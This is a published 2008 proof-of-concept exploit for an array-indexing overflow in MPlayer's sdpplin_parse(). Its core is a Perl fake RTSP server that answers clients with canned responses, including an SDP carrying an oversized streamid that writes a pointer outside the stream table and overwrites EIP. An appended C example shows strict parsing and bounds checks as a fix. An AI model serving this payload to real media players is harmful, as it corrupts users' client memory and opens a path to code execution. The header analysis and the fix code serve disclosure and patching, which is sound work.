MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC
Source: www.vfocus.net  Author: k`sOSe  Published: 2008-03-26

#!/usr/bin/perl

# Houston, mplayer got some vulns!  :(
# CVE-2008-0073 also applies to mplayer and vlc with some distinctions.
#
# Assuming kernel.va_randomize=0 this overwrites EIP with a "stream" structure on my box.
#
# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite
# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and
# some before it.
#
# Vulnerable code:
# sdpplin_parse_stream()
#  desc->stream_id=atoi(buf);
# sdpplin_parse()
#  desc->stream[stream->stream_id]=stream;
#
# Test:
# - mplayer rtsp://evilhost/evil.rm
# eax    0xa0737008  // pointer to desc->stream
# edx    0x0495badd  // "streamid" value
# edi    0x089b59e8  // pointer to stream
#
# <sdpplin_parse+731>: mov    DWORD PTR [eax+edx*4],edi

use warnings;
use strict;
use IO::Socket;

my $evil_num    =  "127467297"; # this is a 4byte offset from desc->stream


my $rtp_hello = "RTSP/1.0 200 OK\r\n".
                "CSeq: 1\r\n".
                "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n".
                "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n".
                "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n".
                "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n".
                "StatsMask: 3\r\n\r\n";

my $rtp_evil =  "RTSP/1.0 200 OK\r\n".
                "CSeq: 2\r\n".
                "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n".
                "vsrc: http://0.00.00.00:31337\r\n".
                "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n".
                "ETag: 55370-2\r\n".
                "Session: 93033-2\r\n".
                "Content-type: application/sdp\r\n".
                "Content-length: 677\r\n\r\n".

                "v=0\r\n".
                "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n".
                "s=realmp3\r\n".
                "i=<No author> <No copyright>\r\n".
                "c=IN IP4 0.0.0.0\r\n".
                "t=0 0\r\n".
                "a=SdpplinVersion:1610645242\r\n".
                "a=StreamCount:integer;\"1166000000\"\r\n".
                "a=Title:buffer;\"dtFabH2rNoP=\"\r\n".
                "a=range:npt=0-39.471000\r\n".
                "m=audio 0 RTP/AVP 101\r\n".    # this is referenced by "stream"
                "b=AS:128\r\n".
                "a=control:streamid=$evil_num\r\n".
                "a=range:npt=0-39.471000\r\n".
                "a=length:npt=39.471000\r\n".
                "a=rtpmap:101 X-MP3-draft-00/1000\r\n".
                "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n".
                "a=StartTime:integer;0\r\n".
                "a=AvgBitRate:integer;128000\r\n".
                "a=SampleRate:integer;44100\r\n".
                "a=AvgPacketSize:integer;417\r\n".
                "a=Preroll:integer;1000\r\n".
                "a=NumChannels:integer;2\r\n".
                "a=MaxPacketSize:integer;1024\r\n".
                "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n";


my @resps = (   $rtp_hello,
                $rtp_evil,

                "RTSP/1.0 200 OK\r\n".
                "CSeq: 3\r\n".
                "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n".
                "Session: 93033-2\n\r".
                "Reconnect: true\n\r".
                "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r".
                "RDTFeatureLevel: 2\r\n".
                "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n",

                "RTSP/1.0 200 OK\r\n".
                "CSeq: 4\r\n".
                "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n".
                "Session: 93033-2\r\n\r\n",

                "RTSP/1.0 200 OK\r\n".
                "CSeq: 5\r\n".
                "Date: Sat, 22 Mar 2008 15:11:06 GMT".
                "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n",
                );


# Fake RTSP server: listen on 554 and answer each client request with the next canned response.
my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1)
        or die "listen on 554 failed: $!";

while(my $csock = $sock->accept)
{
        foreach my $resp(@resps)
        {
                my $buf = read_from_sock($csock);
                print $csock $resp;
        }
}


# Read one RTSP request (up to the blank line ending the headers); no empty prototype,
# since the sub takes the client socket as its argument.
sub read_from_sock
{
        my ($sock) = @_;

        my $buffer = "";

        while(<$sock>)
        {
                return $buffer if /^\r\n$/;
                $buffer .= $_;
        }
        return $buffer;

}
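The header comment of the script describes the defect: `stream_id` comes from `atoi()` on the `a=control:streamid=` value and is used directly as an index into `desc->stream[]`, so a large or negative value stores a pointer far outside the array. The following C program is an added example, not code from MPlayer or xine-lib, and its names (`sdp_desc_t`, `sdp_stream_t`, `MAX_STREAMS`, `parse_stream_id`, `register_stream`, `check_id`, `demo`) are assumptions. It shows what the parser should do instead: parse the field strictly with `strtol()`, reject overflow, sign and trailing junk, and check the id against the table size and the advertised stream count before the store. The inputs, including the PoC's value 127467297, are constructed for the demo.

```c
/* Added example, not MPlayer/xine-lib code: bounds-checked handling of the
 * "streamid=" value that the advisory shows being used as a raw array index. */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_STREAMS 32   /* assumed fixed capacity of desc->stream[] */

typedef struct {
    int stream_id;
} sdp_stream_t;                         /* assumed stand-in for the real stream struct */

typedef struct {
    int stream_count;                   /* from a=StreamCount, validated elsewhere */
    sdp_stream_t *stream[MAX_STREAMS];  /* the table the PoC indexes out of bounds */
} sdp_desc_t;

/* Parse "streamid=N" strictly. Returns 0 and stores the id on success, -1 for
 * anything malformed, signed, overflowing, partially numeric or out of range.
 * Unlike atoi(), strtol() reports overflow and tells us where parsing stopped. */
int parse_stream_id(const char *value, int *out)
{
    const char *prefix = "streamid=";
    size_t plen = strlen(prefix);
    char *end;
    long v;

    if (value == NULL || strncmp(value, prefix, plen) != 0)
        return -1;
    value += plen;
    if (*value == '\0' || *value == '-' || *value == '+')
        return -1;                      /* empty or explicitly signed: reject */

    errno = 0;
    v = strtol(value, &end, 10);
    if (errno == ERANGE || end == value || *end != '\0')
        return -1;                      /* overflow, no digits, or trailing junk */
    if (v < 0 || v >= MAX_STREAMS)
        return -1;                      /* outside the array */
    *out = (int)v;
    return 0;
}

/* Store a stream only after its index was checked against the table size,
 * the advertised stream count, and an already-occupied slot. */
int register_stream(sdp_desc_t *desc, sdp_stream_t *s)
{
    if (s->stream_id < 0 || s->stream_id >= MAX_STREAMS)
        return -1;
    if (s->stream_id >= desc->stream_count)
        return -1;                      /* id beyond StreamCount */
    if (desc->stream[s->stream_id] != NULL)
        return -1;                      /* duplicate id */
    desc->stream[s->stream_id] = s;
    return 0;
}

/* Convenience wrapper: the parsed id, or -1 when the value is rejected. */
int check_id(const char *value)
{
    int id;
    return parse_stream_id(value, &id) == 0 ? id : -1;
}

/* Run the checks over constructed inputs; returns how many were accepted. */
int demo(void)
{
    static const char *inputs[] = {
        "streamid=0", "streamid=1", "streamid=127467297",
        "streamid=-1", "streamid=99999999999999999999",
        "streamid=3abc", "streamid=", "control=1"
    };
    static sdp_stream_t pool[8];
    sdp_desc_t desc;
    int accepted = 0;
    size_t i;

    memset(&desc, 0, sizeof desc);
    desc.stream_count = 2;              /* as if a=StreamCount:integer;"2" had been parsed */

    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int id;
        if (parse_stream_id(inputs[i], &id) != 0) {
            printf("reject %-32s (parse)\n", inputs[i]);
            continue;
        }
        pool[i].stream_id = id;
        if (register_stream(&desc, &pool[i]) != 0) {
            printf("reject %-32s (index)\n", inputs[i]);
            continue;
        }
        printf("accept %-32s -> slot %d\n", inputs[i], id);
        accepted++;
    }
    return accepted;                    /* 2: only ids 0 and 1 survive */
}

int main(void)
{
    demo();
    return 0;
}
```

Only the two in-range ids reach the table; the PoC's value, a negative id, an overflowing number and partially numeric text are all rejected before any array access, which is the check a patched build needs in front of the `desc->stream[stream->stream_id]=stream;` line.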